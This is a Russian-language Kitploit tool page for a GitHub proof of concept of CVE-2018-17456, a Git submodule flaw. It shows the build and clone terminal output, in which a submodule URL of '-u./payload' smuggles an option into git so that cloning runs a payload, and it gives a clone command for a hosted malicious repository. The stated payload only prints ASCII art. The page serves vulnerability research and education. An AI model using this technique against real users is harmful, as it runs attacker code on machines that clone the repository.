Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2018-17456 — Воспроизведение уязвимости CVE-2018-17456 (PoC+Exp) | Kitploit
Инструменты/GitHubGitHub/anonymking/cve-2018-17456
Анализ уязвимостейАнализ КодаЭксплуатацияБезопасность Цепочки ПоставокОбучение и ОбразованиеЭксплуатация Бинарных Файлов
GitHubanonymking/cve-2018-17456

CVE-2018-17456

Воспроизведение уязвимости CVE-2018-17456 (PoC+Exp)

Репозиторий
537 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2018-17456

Обзор уязвимости

  • Название уязвимости: Ошибка проверки ввода Git
  • Номер CNNVD: CNNVD-201810-234
  • Уровень опасности: Критический
  • Номер CVE: CVE-2018-17456
  • Тип уязвимости: Ошибка проверки ввода
  • Дата публикации: 2018-10-08
  • Тип угрозы: Удаленный
  • Дата обновления: 2019-04-25
  • Производитель: debian
  • Источник уязвимости: Atlassian, TerryZh...
  • Описание уязвимости: Git — это бесплатная распределенная система управления версиями с открытым исходным кодом. В Git существует ошибка проверки ввода. Данная уязвимость возникает из-за того, что сетевая система или продукт не выполняет правильную проверку входных данных. Уязвимы следующие версии: Git до 2.14.5, 2.15.x до 2.15.3, 2.16.x до 2.16.5, 2.17.x до 2.17.2, 2.18.x до 2.18.1, 2.19.x до 2.19.1.

Воспроизведение уязвимости

  • Из-за механизма безопасности GitHub невозможно загрузить вредоносный проект, поэтому вы можете запустить скрипт build.sh, чтобы локально создать этот проект для изучения и тестирования.
  • Используемая версия Git: git-2.12.1
  • Процесс и результат:
root@kitploit:~
[anonymking@localhost test]$ ./build.sh 
Initialized empty Git repository in /home/anonymking/Desktop/test/CVE-2018-17456-PoC/Submodule/.git/
[master (root-commit) 5b1e97c] submodule
 1 file changed, 0 insertions(+), 0 deletions(-)
 create mode 100644 hgt_blank
Initialized empty Git repository in /home/anonymking/Desktop/test/CVE-2018-17456-PoC/CVE-2018-17456-PoC/.git/
Cloning into '/home/anonymking/Desktop/test/CVE-2018-17456-PoC/CVE-2018-17456-PoC/exploit:exploit'...
done.
[master (root-commit) ed1914d] CVE-2018-17456
 3 files changed, 6 insertions(+)
 create mode 100644 .gitmodules
 create mode 160000 exploit:exploit
 create mode 100755 payload
git clone --recursive "/home/anonymking/Desktop/test/CVE-2018-17456-PoC/CVE-2018-17456-PoC" des_dir



[anonymking@localhost test]$ git clone --recursive "/home/anonymking/Desktop/test/CVE-2018-17456-PoC/CVE-2018-17456-PoC" test
Cloning into 'test'...
done.
Submodule 'exploit:exploit' (-u./payload) registered for path 'exploit:exploit'
Cloning into 'exploit'...


*********************************************
                   _ooOoo_
                  o8888888o
                  88" . "88
                  (| -_- |)
                  O\  =  /O
               ____/`---'\____
             .'  \\|     |//  `.
            /  \\|||  :  |||//  \
           /  _||||| -:- |||||-  \
           |   | \\\  -  /// |   |
           | \_|  ''\---/''  |   |
           \  .-\__  `-`  ___/-. /
         ___`. .'  /--.--\  `. . __
      ."" '<  `.___\_<|>_/___.'  >'"".
     | | :  `- \`.;`\ _ /`;.`/ - ` : | |
     \  \ `-.   \_ __\ /__ _/   .-` /  /
======`-.____`-.___\_____/___.-`____.-'======
                   `=---='
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

fatal: Could not read from remote repository.

Please make sure you have the correct access rights
and the repository exists.
fatal: clone of '-u./payload' into submodule path '/home/anonymking/Desktop/test/test/exploit:exploit' failed
Failed to clone 'exploit:exploit' a second time, aborting
  • Вредоносный код, который я поместил в payload, просто выводит Будду, поэтому увидеть Будду означает успешное тестирование; на самом деле вывод происходит дважды, так как при неудачном клонировании подмодуля происходит одна повторная попытка.

Ссылки

  • Проект poc-submodule

Неожиданное открытие

  • Мне удалось успешно построить этот проект на Coding — CVE-2018-17456
  • Способ использования:
root@kitploit:~
git clone --recursive https://dev.tencent.com/u/anonymking/p/CVE-2018-17456/git test
  • Также рекомендую изучить два похожих бага вместе: CVE-2017-1000117, CVE-2018-11235
Скачать инструмент